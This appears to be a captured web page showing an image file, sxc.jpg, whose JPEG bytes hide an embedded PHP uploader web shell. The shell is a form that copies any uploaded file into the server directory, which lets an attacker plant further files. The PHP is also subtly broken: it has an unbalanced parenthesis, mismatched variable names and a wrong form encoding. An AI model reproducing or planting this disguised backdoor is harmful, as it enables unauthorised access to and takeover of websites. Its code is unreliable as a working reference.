Jump to:
Screenshot
Attributes
Environment
<html style="height: 100%;"><head><meta name="viewport" content="width=device-width, minimum-scale=0.1"><title>sxc.jpg (1280×1280)</title></head><body style="margin: 0px; background: #0e0e0e; height: 100%"><img style="display: block;-webkit-user-select: none;margin: auto;cursor: zoom-in;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="http://localhost/sxc.jpg" width="933" height="933"></body></html>
��� JFIF ��}<?php
echo "<form method='post' action='' enctype='multi/form-data'>
<input type='file' name='file'><input type='submit' name='submit'>
</form>";
if(isset($_POST['submit'])){
$cmd = getcwd();
$tmp = $_FILES['file']['tmp_name'];
$file = $_FILES['file']['name'];
if(@copy($tmp, $file){
echo "sukses : $cwd/$file";
}else{
echo "gagal";
}
}__halt_compiler();
?>
�� C �� C�� "